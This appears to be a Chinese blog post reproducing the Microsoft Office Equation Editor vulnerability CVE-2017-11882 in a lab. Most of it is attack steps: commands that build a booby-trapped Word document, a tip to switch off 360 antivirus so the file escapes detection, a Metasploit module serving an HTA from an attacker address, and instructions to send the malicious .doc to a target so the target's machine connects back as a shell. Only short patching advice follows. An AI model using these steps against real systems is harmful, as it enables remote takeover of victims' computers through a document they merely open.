[漏洞复现]office CVE-2017-11882

1、漏洞概述

此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016

2、漏洞复现环境

3、实验步骤

3.1 验证漏洞

git clone https://github.com/Ridter/CVE-2017-11882
 cd CVE-2017-11882
 python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
image.png

将生成的test.doc拷贝到windows下,使用word2013打开,会弹出计算器,说明存在这个漏洞。注意需要关闭360,不然这个文件会被查杀。

漏洞验证成功

3.2 getshell

root@kali:~/Desktop/CVE-2017-11882/git clone https://github.com/0x09AL/CVE-2017-11882-metasploit.git
root@kali:~/Desktop/CVE-2017-11882/cd CVE-2017-11882-metasploit
root@kali:~/Desktop/CVE-2017-11882/CVE-2017-11882-metasploit# cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/local/
root@kali:~/Desktop/CVE-2017-11882/CVE-2017-11882-metasploit# cp cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/
msf5 > reload_all
image.png
image.png

在受害者机器上用浏览器打开 http://192.168.43.177:8080/11882,会下载一个hta文件,点击执行,就会回连
或者将/root/.msf4/local/11882.doc发送给目标,使用word2013打开后就会回连。
image.png

拿到shell
getshell

4 漏洞修复

①在线更新;开启Windows Update更新,这种方式对于大部分人来说就够了。
②打补丁;此漏洞对应的微软补丁地址:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

参考资料

https://mp.weixin.qq.com/s?__biz=MzI5ODU1MjIwMg==&mid=2247484096&idx=1&sn=5ecc6a110e847dbc44cfa4a0d61fac8c&chksm=eca55c25dbd2d533206a60538de5135ffb55a380c2664dd7cc0a060afbf7c5a962e86c02309c&scene=21#wechat_redirecthttps://github.com/0x09AL/CVE-2017-11882-metasploit

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值